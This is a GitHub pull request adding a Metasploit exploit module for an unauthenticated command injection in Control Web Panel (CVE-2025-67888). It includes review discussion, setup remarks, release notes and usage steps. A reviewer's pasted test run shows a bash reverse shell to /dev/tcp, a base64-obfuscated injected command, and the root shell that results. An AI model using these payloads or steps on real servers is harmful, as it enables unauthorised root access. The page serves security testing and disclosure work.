Adds module for Control Web Panel API Command Injection (CVE-2025-67888) #20806
Conversation
Co-authored-by: Julien Voisin <[email protected]>
Co-authored-by: Julien Voisin <[email protected]>
msutovsky-r7
changed the title
msutovsky-r7
changed the title
…y single-line conditional - Remove unnecessary return keyword
…pears to CheckCode::Vulnerable - Add cmd/base64 encoder in Payload hash for Unix Command target - Simplify execute_command by removing manual base64 encoding
|
@JohannesLks would you mind providing bit more clear installation steps? I've been trying to install the CWP on fresh CentOS7 using this, but no luck so far, so I wanted check what was your approach for setting up the target? |
@msutovsky-r7 I also had a hard time setting it up, its not straightforward. I used CentOS 8 and I needed to modify the installation script. This should work, if you still hit a wall I am happy to help, but I think that was all it needs. |
msutovsky-r7
left a comment
msutovsky-r7
left a comment
There was a problem hiding this comment.
msf exploit(linux/http/control_web_panel_api_cmd_exec) > run verbose=true
[+] bash -c '0<&67-;exec 67<>/dev/tcp/192.168.168.128/4444;sh <&67 >&67 2>&67'
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking vulnerability with sleep command (waiting 10 seconds)...
[*] Elapsed time: 10.31 seconds
[+] The target is vulnerable. Server waited 10.31 seconds (expected >= 10).
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Executing command: echo${IFS}YmFzaCAtYyAnMDwmMTU5LTtleGVjIDE1OTw+L2Rldi90Y3AvMTkyLjE2OC4xNjguMTI4LzQ0NDQ7c2ggPCYxNTkgPiYxNTkgMj4mMTU5Jw==|((command${IFS}-v${IFS}base64>/dev/null&&(base64${IFS}--decode||base64${IFS}-d))||(command${IFS}-v${IFS}openssl>/dev/null&&openssl${IFS}enc${IFS}-base64${IFS}-d))|sh
[*] Command shell session 1 opened (192.168.168.128:4444 -> 192.168.168.229:43278) at 2026-01-12 15:48:37 +0100
id
uid=0(root) gid=0(root) groups=0(root)
msutovsky-r7
moved this from In Progress
to Waiting on Contributor
in Metasploit Kanban
github-project-automation
bot
moved this from Waiting on Contributor
to In Progress
in Metasploit Kanban
msutovsky-r7
added
the
rn-modules
Release NotesThis adds a new module for Control Web Panel (CVE-2025-67888). The vulnerability is unauthenticated OS command injection through an exposed API. The modules require Softaculous to be installed. |
5 participants
Fixes #20788
Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)
This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.
What does this change do?
Adds
exploit/linux/http/control_web_panel_api_cmd_execwhich exploits a blind command injection via thekeyGET parameter in/admin/index.phpwhenapi=1is set. Successful exploitation grants root-level access.Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.
Files Added
modules/exploits/linux/http/control_web_panel_api_cmd_exec.rbdocumentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.mdVerification
msfconsoleuse exploit/linux/http/control_web_panel_api_cmd_execset RHOSTS <target>set RPORT 2031set SSL trueset LHOST <attacker>checkset payload cmd/unix/reverse_bashexploitReferences